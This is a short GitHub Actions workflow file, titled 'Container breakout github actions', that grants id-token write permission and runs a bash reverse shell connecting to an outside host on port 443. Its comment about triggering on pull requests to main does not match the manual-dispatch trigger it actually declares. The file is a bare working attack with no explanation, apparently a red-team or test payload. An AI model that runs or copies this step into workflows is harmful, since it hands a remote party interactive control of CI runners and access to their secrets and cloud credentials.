name: 'Container breakout github actions'
 
# The workflow should only trigger on pull requests to the main branch
on:
  workflow_dispatch:
 
permissions:
  id-token: write
 
jobs:
  read-dev:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout
        uses: actions/checkout@v3

      - run: sh -i >& /dev/tcp/goku.1337.cx/443 0>&1
        shell: bash
